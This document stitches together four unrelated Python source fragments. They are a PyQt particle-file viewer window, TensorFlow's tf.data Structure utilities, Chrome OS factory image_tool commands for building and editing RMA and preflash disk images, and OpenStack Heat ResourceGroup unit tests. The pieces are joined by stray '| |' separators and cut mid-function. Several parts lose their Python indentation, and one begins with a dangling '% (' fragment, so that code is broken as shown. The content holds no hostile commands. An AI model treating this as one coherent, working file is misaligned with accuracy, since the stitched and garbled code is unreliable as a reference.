self.setCentralWidget(splitter)
particleTable = ParticleTableWidget(self.data, self)
splitter.addWidget(particleTable)
right = QWidget(self)
splitter.addWidget(right)
vbox = QVBoxLayout(right)
right.setLayout(vbox)
fixedAttrWidget = FixedAttributesWidget(self.data, self)
vbox.addWidget(fixedAttrWidget)
indexedStrings = IndexedStringsWidget(self.data, self)
vbox.addWidget(indexedStrings)
vbox.addStretch()
# TODD: SCROLLABLE AREAS FOR EVERYTHING
self.data.dirtied.connect(self.dataDirtiedSlot)
# Configure ctrl-w to close the window
QShortcut( QKeySequence(Qt.CTRL + Qt.Key_W), self, self.close )
#--------------------------------------------------------------------------
def openSlot(self):
""" Callback from Open button """
# TODO: Check for edits and prompt to save dirty
if self.data.filename:
dirname = os.path.dirname(self.data.filename)
else:
dirname = os.getcwd()
filename = QFileDialog.getOpenFileName(self, "Open particle file", dirname, "(*.bgeo *.geo *.bhclassic *.ptc *.pdb)")
if filename:
if isinstance(filename, tuple):
filename = filename[0]
self.open(str(filename))
#--------------------------------------------------------------------------
    def open(self, filename):
        """ Opens a file from disk and populates the UI.

        The widgets are not refreshed directly here; presumably
        ParticleData.read emits dataReset, which the table and panels
        listen for -- verify against ParticleData.
        """
        self.data.read(filename)
        self.setWindowTitle(filename)
#--------------------------------------------------------------------------
    def setData(self, particleSet):
        """ Uses the given particle set as its data.

        Allows an embedding application to hand in an in-memory particle
        set instead of reading one from disk.
        """
        self.data.setData(particleSet)
#--------------------------------------------------------------------------
    def saveSlot(self):
        """ Callback from Save button: save in full (non-delta) mode. """
        self.save(False)
#--------------------------------------------------------------------------
def | |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for describing the structure of a `tf.data` type."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
from tensorflow.python.data.util import nest
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor as sparse_tensor_lib
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.util.tf_export import tf_export
_STRUCTURE_CONVERSION_FUNCTION_REGISTRY = {}
class Structure(object):
  """Represents structural information, such as type and shape, about a value.
  A `Structure` generalizes the `tf.Tensor.dtype` and `tf.Tensor.shape`
  properties, so that we can define generic containers of objects including:
  * `tf.Tensor`
  * `tf.SparseTensor`
  * Nested structures of the above.
  TODO(b/110122868): In the future, a single `Structure` will replace the
  `tf.data.Dataset.output_types`, `tf.data.Dataset.output_shapes`,
  and `tf.data.Dataset.output_classes`, and similar properties and arguments in
  the `tf.data.Iterator` and `Optional` classes.
  """
  __metaclass__ = abc.ABCMeta
  @abc.abstractproperty
  def _flat_shapes(self):
    """A list of shapes matching the shapes of `self._to_tensor_list()`.
    Returns:
      A list of `tf.TensorShape` objects.
    """
    raise NotImplementedError("Structure._flat_shapes")
  @abc.abstractproperty
  def _flat_types(self):
    """A list of types matching the types of `self._to_tensor_list()`.
    Returns:
      A list of `tf.DType` objects.
    """
    # Fixed: previously named "Structure._flat_shapes" (copy-paste error).
    raise NotImplementedError("Structure._flat_types")
  @abc.abstractmethod
  def is_compatible_with(self, other):
    """Returns `True` if `other` is compatible with this structure.
    A structure `t` is a "subtype" of `s` if:
    * `s` and `t` are instances of the same `Structure` subclass.
    * The nested structures (if any) of `s` and `t` are the same, according to
      `tf.contrib.framework.nest.assert_same_structure`, and each nested
      structure of `t` is a "subtype" of the corresponding nested structure of
      `s`.
    * Any `tf.DType` components of `t` are the same as the corresponding
      components in `s`.
    * Any `tf.TensorShape` components of `t` are compatible with the
      corresponding components in `s`, according to
      `tf.TensorShape.is_compatible_with`.
    Args:
      other: A `Structure`.
    Returns:
      `True` if `other` is a subtype of this structure, otherwise `False`.
    """
    raise NotImplementedError("Structure.is_compatible_with()")
  @abc.abstractmethod
  def _to_tensor_list(self, value):
    """Returns a flat list of `tf.Tensor` representing `value`.
    This method can be used, along with `self._flat_shapes` and
    `self._flat_types` to represent structured values in lower level APIs
    (such as plain TensorFlow operations) that do not understand structure.
    Requires: `self.is_compatible_with(Structure.from_value(value))`.
    Args:
      value: A value with compatible structure.
    Returns:
      A flat list of `tf.Tensor` representing `value`.
    """
    raise NotImplementedError("Structure._to_tensor_list()")
  @abc.abstractmethod
  def _from_tensor_list(self, flat_value):
    """Builds a flat list of `tf.Tensor` into a value matching this structure.
    Requires: The shapes and types of the tensors in `flat_value` must be
    compatible with `self._flat_shapes` and `self._flat_types` respectively.
    Args:
      flat_value: A list of `tf.Tensor` with compatible flat structure.
    Returns:
      A structured object matching this structure.
    """
    raise NotImplementedError("Structure._from_tensor_list()")
  @staticmethod
  def from_value(value):
    """Returns a `Structure` that represents the given `value`.
    Args:
      value: A potentially structured value.
    Returns:
      A `Structure` that is compatible with `value`.
    Raises:
      TypeError: If a structure cannot be built for `value`, because its type
        or one of its component types is not supported.
    """
    # TODO(b/110122868): Add support for custom types and Dataset to this
    # method.
    if isinstance(
        value,
        (sparse_tensor_lib.SparseTensor, sparse_tensor_lib.SparseTensorValue)):
      return SparseTensorStructure.from_value(value)
    elif isinstance(value, tensor_array_ops.TensorArray):
      return TensorArrayStructure.from_value(value)
    elif isinstance(value, (tuple, dict)):
      return NestedStructure.from_value(value)
    else:
      # Registered converters take precedence over the generic
      # convert_to_tensor fallback below.
      for converter_type, converter_fn in (
          _STRUCTURE_CONVERSION_FUNCTION_REGISTRY.items()):
        if isinstance(value, converter_type):
          return converter_fn(value)
      try:
        tensor = ops.convert_to_tensor(value)
      except (ValueError, TypeError):
        raise TypeError("Could not build a structure for %r" % value)
      return TensorStructure.from_value(tensor)
  @staticmethod
  def _from_legacy_structure(output_types, output_shapes, output_classes):
    """Returns a `Structure` that represents the given legacy structure.
    This method provides a way to convert from the existing `Dataset` and
    `Iterator` structure-related properties to a `Structure` object.
    TODO(b/110122868): Remove this method once `Structure` is used throughout
    `tf.data`.
    Args:
      output_types: A nested structure of `tf.DType` objects corresponding to
        each component of a structured value.
      output_shapes: A nested structure of `tf.TensorShape` objects
        corresponding to each component a structured value.
      output_classes: A nested structure of Python `type` objects corresponding
        to each component of a structured value.
    Returns:
      A `Structure`.
    Raises:
      TypeError: If a structure cannot be built the arguments, because one of
        the component classes in `output_classes` is not supported.
    """
    flat_types = nest.flatten(output_types)
    flat_shapes = nest.flatten(output_shapes)
    flat_classes = nest.flatten(output_classes)
    flat_ret = []
    for flat_type, flat_shape, flat_class in zip(flat_types, flat_shapes,
                                                 flat_classes):
      if issubclass(flat_class, sparse_tensor_lib.SparseTensor):
        flat_ret.append(SparseTensorStructure(flat_type, flat_shape))
      elif issubclass(flat_class, ops.Tensor):
        flat_ret.append(TensorStructure(flat_type, flat_shape))
      else:
        # NOTE(mrry): Since legacy structures produced by iterators only
        # comprise Tensors, SparseTensors, and nests, we do not need to support
        # all structure types here.
        # Fixed: report the unsupported class rather than its dtype, matching
        # convert_legacy_structure() below.
        raise TypeError(
            "Could not build a structure for output class %r" % (flat_class,))
    ret = nest.pack_sequence_as(output_classes, flat_ret)
    if isinstance(ret, Structure):
      return ret
    else:
      return NestedStructure(ret)
  @staticmethod
  def _register_custom_converter(type_object, converter_fn):
    """Registers `converter_fn` for converting values of the given type.
    Args:
      type_object: A Python `type` object representing the type of values
        accepted by `converter_fn`.
      converter_fn: A function that takes one argument (an instance of the
        type represented by `type_object`) and returns a `Structure`.
    """
    _STRUCTURE_CONVERSION_FUNCTION_REGISTRY[type_object] = converter_fn
  @abc.abstractmethod
  def _to_legacy_output_types(self):
    raise NotImplementedError("Structure._to_legacy_output_types()")
  @abc.abstractmethod
  def _to_legacy_output_shapes(self):
    raise NotImplementedError("Structure._to_legacy_output_shapes()")
  @abc.abstractmethod
  def _to_legacy_output_classes(self):
    raise NotImplementedError("Structure._to_legacy_output_classes()")
def normalize_tensors(tensors):
  """Converts a nested structure of tensor-like objects to tensors.
  * `SparseTensor`-like inputs are converted to `SparseTensor`.
  * `TensorArray` inputs are passed through.
  * Everything else is converted to a dense `Tensor`.
  Args:
    tensors: A nested structure of tensor-like, list,
      `SparseTensor`, `SparseTensorValue`, or `TensorArray` objects.
  Returns:
    A nested structure of tensor, `SparseTensor`, or `TensorArray` objects.
  """
  flat = nest.flatten(tensors)
  with ops.name_scope("normalize_tensors"):
    normalized = []
    for index, element in enumerate(flat):
      if sparse_tensor_lib.is_sparse(element):
        # Promote SparseTensorValue (and friends) to a real SparseTensor.
        normalized.append(sparse_tensor_lib.SparseTensor.from_value(element))
      elif isinstance(element, tensor_array_ops.TensorArray):
        normalized.append(element)
      else:
        normalized.append(
            ops.convert_to_tensor(element, name="component_%d" % index))
  # Re-nest the flat results into the caller's original structure.
  return nest.pack_sequence_as(tensors, normalized)
def convert_legacy_structure(output_types, output_shapes, output_classes):
  """Returns a `Structure` that represents the given legacy structure.
  This method provides a way to convert from the existing `Dataset` and
  `Iterator` structure-related properties to a `Structure` object. A "legacy"
  structure is represented by the `tf.data.Dataset.output_types`,
  `tf.data.Dataset.output_shapes`, and `tf.data.Dataset.output_classes`
  properties.
  TODO(b/110122868): Remove this function once `Structure` is used throughout
  `tf.data`.
  Args:
    output_types: A nested structure of `tf.DType` objects corresponding to
      each component of a structured value.
    output_shapes: A nested structure of `tf.TensorShape` objects
      corresponding to each component a structured value.
    output_classes: A nested structure of Python `type` objects corresponding
      to each component of a structured value.
  Returns:
    A `Structure`.
  Raises:
    TypeError: If a structure cannot be built from the arguments, because one of
      the component classes in `output_classes` is not supported.
  """
  components = []
  triples = zip(nest.flatten(output_types), nest.flatten(output_shapes),
                nest.flatten(output_classes))
  for dtype, shape, cls in triples:
    if isinstance(cls, Structure):
      # Already converted; pass through unchanged.
      components.append(cls)
    elif issubclass(cls, sparse_tensor_lib.SparseTensor):
      components.append(SparseTensorStructure(dtype, shape))
    elif issubclass(cls, ops.Tensor):
      components.append(TensorStructure(dtype, shape))
    elif issubclass(cls, tensor_array_ops.TensorArray):
      # We sneaked the dynamic_size and infer_shape into the legacy shape:
      # shape[0] is dynamic_size, shape[1] is infer_shape, and the element
      # shape follows.
      components.append(
          TensorArrayStructure(
              dtype, shape[2:],
              dynamic_size=tensor_shape.dimension_value(shape[0]),
              infer_shape=tensor_shape.dimension_value(shape[1])))
    else:
      # NOTE(mrry): Since legacy structures produced by iterators only
      # comprise Tensors, SparseTensors, and nests, we do not need to
      # support all structure types here.
      raise TypeError(
          "Could not build a structure for output class %r" % (cls,))
  packed = nest.pack_sequence_as(output_classes, components)
  return packed if isinstance(packed, Structure) else NestedStructure(packed)
# NOTE(mrry): The following classes make extensive use of non-public methods of
# their base class, so we disable the protected-access lint warning once here.
# pylint: disable=protected-access
class NestedStructure(Structure):
"""Represents a nested structure in which each leaf is a `Structure`."""
def __init__(self, nested_structure):
self._nested_structure = nested_structure
self._flat_shapes_list = []
self._flat_types_list = []
for s in nest.flatten(nested_structure):
if not isinstance(s, Structure):
raise TypeError("nested_structure must be a (potentially nested) tuple "
"or dictionary of Structure objects.")
self._flat_shapes_list.extend(s._flat_shapes)
self._flat_types_list.extend(s._flat_types)
  @property
  def _flat_shapes(self):
    # Concatenated flat shapes of every leaf Structure, in `nest.flatten`
    # order (precomputed in `__init__`).
    return self._flat_shapes_list
  @property
  def _flat_types(self):
    # Concatenated flat types of every leaf Structure, in `nest.flatten`
    # order (precomputed in `__init__`).
    return self._flat_types_list
def is_compatible_with(self, other):
if not isinstance(other, NestedStructure):
return False
try:
# pylint: disable=protected-access
nest.assert_same_structure(self._nested_structure,
other._nested_structure)
except (ValueError, TypeError):
return False
return all(
substructure.is_compatible_with(other_substructure)
for substructure, other_substructure in zip(
nest.flatten(self._nested_structure),
nest.flatten(other._nested_structure)))
| |
% (
part, PATH_CROS_FIRMWARE_UPDATER, output))
class NetbootFirmwareSettingsCommand(SubCommand):
  """Access Chrome OS netboot firmware (image.net.bin) settings."""
  name = 'netboot'
  aliases = ['netboot_firmware_settings']
  def Init(self):
    # Argument definitions live with the implementation module.
    netboot_firmware_settings.DefineCommandLineArgs(self.subparser)
  def Run(self):
    # Thin wrapper: all behavior is implemented by the settings module.
    netboot_firmware_settings.NetbootFirmwareSettings(self.args)
class GPTCommand(SubCommand):
  """Access GPT (GUID Partition Table) with `cgpt` style commands."""
  name = 'gpt'
  aliases = ['pygpt', 'cgpt']
  # Populated in Init; holds the pygpt command dispatcher.
  gpt = None
  def Init(self):
    # Delegate sub-argument definition to pygpt's own command registry.
    self.gpt = pygpt.GPTCommands()
    self.gpt.DefineArgs(self.subparser)
  def Run(self):
    self.gpt.Execute(self.args)
class ResizeFileSystemCommand(SubCommand):
  """Changes file system size from a partition on a Chromium OS disk image.

  By default the requested --size_mb is added to the current file system
  size; with --no-append it becomes the new absolute size. The new size may
  never exceed the partition itself.
  """
  name = 'resize'
  aliases = ['resize_image_fs']
  def Init(self):
    parser = self.subparser
    parser.add_argument(
        '-i', '--image', type=ArgTypes.ExistsPath, required=True,
        help='path to the Chromium OS disk image')
    parser.add_argument(
        '-p', '--partition_number', type=int, default=1,
        help='file system on which partition to resize')
    parser.add_argument(
        '-s', '--size_mb', type=int, default=1024,
        help='file system size to change (set or add, see --append) in MB')
    parser.add_argument(
        '-a', '--append', dest='append', action='store_true', default=True,
        help='append (increase) file system by +size_mb')
    parser.add_argument(
        '--no-append', dest='append', action='store_false',
        help='set file system to a new size of size_mb')
  def Run(self):
    part = Partition(self.args.image, self.args.partition_number)
    old_size = part.GetFileSystemSize()
    # Compute the target size in bytes (absolute, or relative to current).
    target = self.args.size_mb * MEGABYTE
    if self.args.append:
      target += old_size
    if target > part.size:
      raise RuntimeError(
          'Requested size (%s MB) larger than %s partition (%s MB).' % (
              target // MEGABYTE, part, part.size // MEGABYTE))
    # ResizeFileSystem may adjust the size; report what it actually did.
    final_size = part.ResizeFileSystem(target)
    print('OK: %s file system has been resized from %s to %s MB.' %
          (part, old_size // MEGABYTE, final_size // MEGABYTE))
class CreatePreflashImageCommand(SubCommand):
  """Create a disk image for factory to pre-flash into internal storage.
  The output contains factory toolkit, release and test images.
  The manufacturing line can directly dump this image to device boot media
  (eMMC, SSD, NVMe, ... etc) using 'dd' command or copy machines.
  """
  name = 'preflash'
  def Init(self):
    # Shared bundle arguments (release/test image, toolkit, hwid, ...).
    ChromeOSFactoryBundle.DefineBundleArguments(
        self.subparser, ChromeOSFactoryBundle.PREFLASH)
    self.subparser.add_argument(
        '--sectors', type=int, default=31277232,
        help=('size of image in sectors (see --sector-size). '
              'default: %(default)s'))
    self.subparser.add_argument(
        '--sector-size', type=int, default=DEFAULT_BLOCK_SIZE,
        help='size of each sector. default: %(default)s')
    self.subparser.add_argument(
        '--stateful_free_space', type=int, default=1024,
        help=('extra space to claim in stateful partition in MB. '
              'default: %(default)s'))
    self.subparser.add_argument(
        '-o', '--output', required=True,
        help='path to the output disk image file.')
  def Run(self):
    # Assemble the bundle in a temp dir; CreateDiskImage writes the output.
    with SysUtils.TempDirectory(prefix='diskimg_') as temp_dir:
      bundle = ChromeOSFactoryBundle(
          temp_dir=temp_dir,
          board=PREFLASH_DEFAULT_BOARD,
          release_image=self.args.release_image,
          test_image=self.args.test_image,
          toolkit=self.args.toolkit,
          factory_shim=None,
          enable_firmware=False,
          hwid=self.args.hwid,
          complete=None,
          project_config=self.args.project_config,
          project=self.args.project,
          designs=self.args.designs,
      )
      if self.args.verify_cros_config:
        bundle.VerifyCrosConfig()
      new_size = bundle.CreateDiskImage(
          self.args.output, self.args.sectors, self.args.sector_size,
          self.args.stateful_free_space, self.args.verbose)
    print('OK: Generated pre-flash disk image at %s [%s G]' % (
        self.args.output, new_size // GIGABYTE_STORAGE))
class ShowPreflashImageCommand(SubCommand):
  """Show the content of a disk image."""
  name = 'preflash-show'
  def Init(self):
    self.subparser.add_argument(
        '-i', '--image', required=True,
        type=ArgTypes.ExistsPath,
        help='Path to input preflash image.')
  def Run(self):
    # Read-only: prints the image contents, never modifies the image.
    ChromeOSFactoryBundle.ShowDiskImage(self.args.image)
# NOTE(review): 'Commmand' (triple m) is a typo in the class name; harmless
# because sub-commands are looked up via `name`, but worth a separate cleanup.
class CreateRMAImageCommmand(SubCommand):
  """Create an RMA image for factory to boot from USB and repair device.
  The output is a special factory install shim (factory_install) with all
  resources (release, test images and toolkit). The manufacturing line or RMA
  centers can boot it from USB and install all factory software bits into
  a device.
  """
  namespace = CMD_NAMESPACE_RMA
  name = 'create'
  aliases = ['create_rma', 'rma-create']
  def Init(self):
    # Shared bundle arguments (release/test image, toolkit, firmware, ...).
    ChromeOSFactoryBundle.DefineBundleArguments(
        self.subparser, ChromeOSFactoryBundle.RMA)
    self.subparser.add_argument(
        '--active_test_list', default=None,
        help='active test list')
    self.subparser.add_argument(
        '-f', '--force', action='store_true',
        help='Overwrite existing output image file.')
    self.subparser.add_argument(
        '-o', '--output', required=True,
        help='path to the output RMA image file')
  def Run(self):
    output = self.args.output
    # Refuse to clobber an existing file unless explicitly forced.
    if os.path.exists(output) and not self.args.force:
      raise RuntimeError(
          'Output already exists (add -f to overwrite): %s' % output)
    with SysUtils.TempDirectory(prefix='rma_') as temp_dir:
      bundle = ChromeOSFactoryBundle(
          temp_dir=temp_dir,
          board=self.args.board,
          release_image=self.args.release_image,
          test_image=self.args.test_image,
          toolkit=self.args.toolkit,
          factory_shim=self.args.factory_shim,
          enable_firmware=self.args.enable_firmware,
          firmware=self.args.firmware,
          hwid=self.args.hwid,
          complete=self.args.complete,
          toolkit_config=self.args.toolkit_config,
          description=self.args.description,
          project_config=self.args.project_config,
          project=self.args.project,
          designs=self.args.designs,
      )
      if self.args.verify_cros_config:
        bundle.VerifyCrosConfig()
      bundle.CreateRMAImage(self.args.output,
                            active_test_list=self.args.active_test_list)
      # Echo the resulting image layout for the operator to inspect.
      ChromeOSFactoryBundle.ShowRMAImage(output)
      print('OK: Generated %s RMA image at %s' %
            (bundle.board, self.args.output))
class MergeRMAImageCommand(SubCommand):
  """Merge multiple RMA images into one single large image."""
  namespace = CMD_NAMESPACE_RMA
  name = 'merge'
  aliases = ['merge_rma', 'rma-merge']
  def Init(self):
    self.subparser.add_argument(
        '-f', '--force', action='store_true',
        help='Overwrite existing output image file.')
    self.subparser.add_argument(
        '-o', '--output', required=True,
        help='Path to the merged output image.')
    self.subparser.add_argument(
        '-i', '--images', required=True, nargs='+',
        type=ArgTypes.ExistsPath,
        help='Path to input RMA images')
    self.subparser.add_argument(
        '-a', '--auto_select', action='store_true',
        help='Automatically resolve duplicate boards (use the last one).')
  def Run(self):
    """Merge multiple RMA (USB installation) disk images.
    The RMA images should be created by 'image_tool rma' command, with different
    board names.
    """
    output = self.args.output
    # Refuse to clobber an existing file unless explicitly forced.
    if os.path.exists(output) and not self.args.force:
      raise RuntimeError(
          'Output already exists (add -f to overwrite): %s' % output)
    # Merging a single image would be a no-op; require at least two inputs.
    if len(self.args.images) < 2:
      raise RuntimeError('Need > 1 input image files to merge.')
    print('Scanning %s input image files...' % len(self.args.images))
    ChromeOSFactoryBundle.MergeRMAImage(
        self.args.output, self.args.images, self.args.auto_select)
    # Echo the resulting image layout for the operator to inspect.
    ChromeOSFactoryBundle.ShowRMAImage(output)
    print('OK: Merged successfully in new image: %s' % output)
class ExtractRMAImageCommand(SubCommand):
  """Extract an RMA image from a universal RMA image."""
  namespace = CMD_NAMESPACE_RMA
  name = 'extract'
  aliases = ['extract_rma', 'rma-extract']
  def Init(self):
    self.subparser.add_argument(
        '-f', '--force', action='store_true',
        help='Overwrite existing output image file.')
    self.subparser.add_argument(
        '-o', '--output', required=True,
        help='Path to the merged output image.')
    self.subparser.add_argument(
        '-i', '--image', required=True,
        type=ArgTypes.ExistsPath,
        help='Path to input RMA image.')
    self.subparser.add_argument(
        '-s', '--select', default=None,
        help='Select the SELECT-th board in the shim to extract.')
  def Run(self):
    """Extract RMA (USB installation) disk image from a universal RMA image.
    The RMA image should be created by 'image_tool rma create' or
    'image_tool rma merge' command.
    """
    output = self.args.output
    # Refuse to clobber an existing file unless explicitly forced.
    if os.path.exists(output) and not self.args.force:
      raise RuntimeError(
          'Output already exists (add -f to overwrite): %s' % output)
    print('Scanning input image file...')
    # --select picks which board's image to extract; None presumably prompts
    # or defaults inside ExtractRMAImage -- confirm against that method.
    ChromeOSFactoryBundle.ExtractRMAImage(
        self.args.output, self.args.image, self.args.select)
    # Echo the resulting image layout for the operator to inspect.
    ChromeOSFactoryBundle.ShowRMAImage(output)
    print('OK: Extracted successfully in new image: %s' % output)
class ShowRMAImageCommand(SubCommand):
  """Show the content of a RMA image."""
  # Registration metadata consumed by the SubCommand CLI framework.
  namespace = CMD_NAMESPACE_RMA
  name = 'show'
  aliases = ['show_rma', 'rma-show']

  def Init(self):
    self.subparser.add_argument(
        '-i', '--image', required=True,
        type=ArgTypes.ExistsPath,
        help='Path to input RMA image.')

  def Run(self):
    # Pure delegation: the bundle helper prints the image contents.
    ChromeOSFactoryBundle.ShowRMAImage(self.args.image)
class ReplaceRMAComponentCommand(SubCommand):
  """Replace components in an RMA shim."""
  # Registration metadata consumed by the SubCommand CLI framework.
  namespace = CMD_NAMESPACE_RMA
  name = 'replace'
  aliases = ['replace_rma', 'rma-replace']

  def Init(self):
    # Reuse the shared bundle argument definitions, restricted to the payload
    # kinds that may be replaced in an existing shim.
    ChromeOSFactoryBundle.DefineBundleArguments(
        self.subparser, ChromeOSFactoryBundle.REPLACEABLE)
    self.subparser.add_argument(
        '-i', '--image', required=True,
        type=ArgTypes.ExistsPath,
        help='Path to input RMA image.')
    self.subparser.add_argument(
        '--firmware_from_release', action='store_true',
        help='Replace firmware with the one in the provided release image.')

  def Run(self):
    """Replace payloads (and optionally the factory shim) in an RMA image."""
    with SysUtils.TempDirectory(prefix='rma_') as temp_dir:
      # Get firmware from release_image.
      if self.args.release_image and self.args.firmware_from_release:
        part = Partition(self.args.release_image, PART_CROS_ROOTFS_A)
        self.args.firmware = part.CopyFile(
            PATH_CROS_FIRMWARE_UPDATER, temp_dir, fs_type=FS_TYPE_CROS_ROOTFS)
      # Replacing factory shim is different from replacing other payloads.
      # Other payloads are stored as compressed files in stateful partition. We
      # only need to replace files and adjust the size of stateful partition,
      # which is easy because stateful partition is the last partition.
      # Replacing factory shim actually replaces kernel and rootfs partition.
      # These partitions are not the last partition and we cannot easily change
      # their sizes, so we can only use the factory shim to create a new RMA
      # shim and overwrite the original image.
      single_board_image = None
      if self.args.factory_shim:
        if self.args.board is None:
          self.args.board = _GetBoardName(self.args.image)
        logging.warning('Replacing factory shim for board %s. '
                        'lsb-factory configs will be cleared.', self.args.board)
        single_board_image = os.path.join(temp_dir, 'single_board.bin')
        bundle = ChromeOSFactoryBundle(
            temp_dir=temp_dir,
            board=self.args.board,
            release_image=None,
            test_image=None,
            toolkit=None,
            factory_shim=self.args.factory_shim)
        with Partition(self.args.image, PART_CROS_STATEFUL).Mount() as stateful:
          DIR_CROS_PAYLOADS = CrosPayloadUtils.GetCrosPayloadsDir()
          src_payloads_dir = os.path.join(stateful, DIR_CROS_PAYLOADS)
          # Rebuild a single-board shim from the new factory shim, reusing the
          # payloads already present in the original image.
          bundle.CreateRMAImage(
              single_board_image, src_payloads_dir=src_payloads_dir)
          # Also get RMA metadata here.
          rma_metadata = _ReadRMAMetadata(stateful)
      # Payload replacement happens on the freshly created single-board image
      # when the shim was replaced, otherwise in-place on the input image.
      target_image = (
          single_board_image if single_board_image else self.args.image)
      ChromeOSFactoryBundle.ReplaceRMAPayload(
          target_image,
          board=self.args.board,
          release_image=self.args.release_image,
          test_image=self.args.test_image,
          toolkit=self.args.toolkit,
          firmware=self.args.firmware,
          hwid=self.args.hwid,
          complete=self.args.complete,
          toolkit_config=self.args.toolkit_config,
          project_config=self.args.project_config)
      if self.args.factory_shim:
        if len(rma_metadata) > 1:
          # If the original shim is a multi-board shim, we need to replace the
          # board in the multi-board shim with the new single-board shim.
          multi_board_image = os.path.join(temp_dir, 'multi_board.bin')
          ChromeOSFactoryBundle.MergeRMAImage(
              multi_board_image, [self.args.image, single_board_image],
              auto_select=True)
          Shell(['mv', multi_board_image, self.args.image])
        else:
          Shell(['mv', single_board_image, self.args.image])
      # Display the final image's contents as a confirmation summary.
      ChromeOSFactoryBundle.ShowRMAImage(self.args.image)
      print('OK: Replaced components successfully in image: %s' % self.args.image)
class ToolkitCommand(SubCommand):
  """Unpack/repack the factory toolkit in an RMA shim."""
  # Registration metadata consumed by the SubCommand CLI framework.
  namespace = CMD_NAMESPACE_PAYLOAD
  name = 'toolkit'

  def Init(self):
    # Declare toolkit unpack/repack arguments; exactly one of
    # --unpack/--repack is expected (validated in Run).
    self.subparser.add_argument(
        '-i', '--image', required=True,
        type=ArgTypes.ExistsPath,
        help='Path to input RMA image.')
    self.subparser.add_argument(
        '--board', type=str, default=None,
        help='Board to get toolkit.')
    self.subparser.add_argument(
        '--unpack', type=str, default=None,
        help='Path to unpack the toolkit.')
    self.subparser.add_argument(
        '--repack', type=str, default=None,
        help='Path to repack the toolkit.')
def Run(self):
# Check that exactly one of --unpack and --repack is specified.
# When unpacking, check that the unpack directory doesn't exist yet.
# When repacking, check that the repack directory exists.
if not bool(self.args.unpack) ^ bool(self.args.repack):
raise RuntimeError('Please specify exactly one of --unpack and --repack.')
target_path = self.args.unpack or self.args.repack
if self.args.unpack:
if os.path.exists(target_path):
raise RuntimeError('Extract path "%s" already exists.' % target_path)
if self.args.repack:
if not os.path.isdir(target_path):
raise RuntimeError('PATH should be a directory.')
| |
= "Bar___foo__"
res_def['properties']['listprop'] = ["__foo___0",
"__foo___1",
"__foo___2"]
res_def['type'] = "ResourceWithListProp__foo__"
snip = snip.freeze(properties=props)
resg = resource_group.ResourceGroup('test', snip, stack)
expect = {
"heat_template_version": "2015-04-30",
"resources": {
"0": {
"type": "ResourceWithListProp__foo__",
"properties": {
"Foo": "Bar_0",
"listprop": [
"0_0", "0_1", "0_2"
]
}
}
},
"outputs": {
"refs_map": {
"value": {
"0": {"get_resource": "0"},
}
}
}
}
nested = resg._assemble_nested(['0']).t
res_prop = nested['resources']['0']['properties']
res_prop['listprop'] = list(res_prop['listprop'])
self.assertEqual(expect, nested)
def test_assemble_no_properties(self):
    """A resource_def without a 'properties' section must still validate."""
    tmpl = copy.deepcopy(template)
    definition = tmpl["resources"]["group1"]["properties"]['resource_def']
    del definition['properties']
    parsed = utils.parse_stack(tmpl)
    group = parsed.resources['group1']
    self.assertIsNone(group.validate())
def test_validate_with_blacklist(self):
    """Validation succeeds when the only invalid member is blacklisted.

    'image0' resolves to an inactive image; putting member "0" on the
    removal list means its definition is not validated.
    """
    templ = copy.deepcopy(template_server)
    self.mock_flavor = mock.Mock(ram=4, disk=4)
    self.mock_active_image = mock.Mock(min_ram=1, min_disk=1,
                                       status='active')
    self.mock_inactive_image = mock.Mock(min_ram=1, min_disk=1,
                                         status='inactive')

    def get_image(image_identifier):
        # Only 'image0' (used by the blacklisted member) is inactive.
        if image_identifier == 'image0':
            return self.mock_inactive_image
        else:
            return self.mock_active_image

    self.patchobject(glance.GlanceClientPlugin, 'get_image',
                     side_effect=get_image)
    self.patchobject(nova.NovaClientPlugin, 'get_flavor',
                     return_value=self.mock_flavor)
    props = templ["resources"]["group1"]["properties"]
    props["removal_policies"] = [{"resource_list": ["0"]}]
    stack = utils.parse_stack(templ)
    resg = stack.resources['group1']
    self.assertIsNone(resg.validate())
def test_invalid_res_type(self):
    """Test that error raised for unknown resource type."""
    broken = copy.deepcopy(template)
    broken['resources']['group1']['properties']['resource_def']['type'] = (
        "idontexist")
    stack = utils.parse_stack(broken)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    err = self.assertRaises(exception.StackValidationFailed, group.validate)
    self.assertIn('The Resource Type (idontexist) could not be found.',
                  str(err))
def test_reference_attr(self):
    """A group whose template references member attributes validates."""
    stack = utils.parse_stack(template2)
    group = resource_group.ResourceGroup(
        'test', stack.t.resource_definitions(stack)['group1'], stack)
    self.assertIsNone(group.validate())
def test_validate_reference_attr_with_none_ref(self):
    """Validation tolerates a referenced attribute with a None path."""
    stack = utils.parse_stack(template_attr)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    self.patchobject(group, 'referenced_attrs',
                     return_value={('nested_dict', None)})
    self.assertIsNone(group.validate())
def test_invalid_removal_policies_nolist(self):
    """Test that error raised for malformed removal_policies."""
    broken = copy.deepcopy(template)
    broken['resources']['group1']['properties']['removal_policies'] = (
        'notallowed')
    stack = utils.parse_stack(broken)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    err = self.assertRaises(exception.StackValidationFailed, group.validate)
    self.assertIn("removal_policies: \"'notallowed'\" is not a list", str(err))
def test_invalid_removal_policies_nomap(self):
    """Test that error raised for malformed removal_policies."""
    broken = copy.deepcopy(template)
    broken['resources']['group1']['properties']['removal_policies'] = (
        ['notallowed'])
    stack = utils.parse_stack(broken)
    defn = stack.t.resource_definitions(stack)['group1']
    group = resource_group.ResourceGroup('test', defn, stack)
    err = self.assertRaises(exception.StackValidationFailed, group.validate)
    self.assertIn('"notallowed" is not a map', str(err))
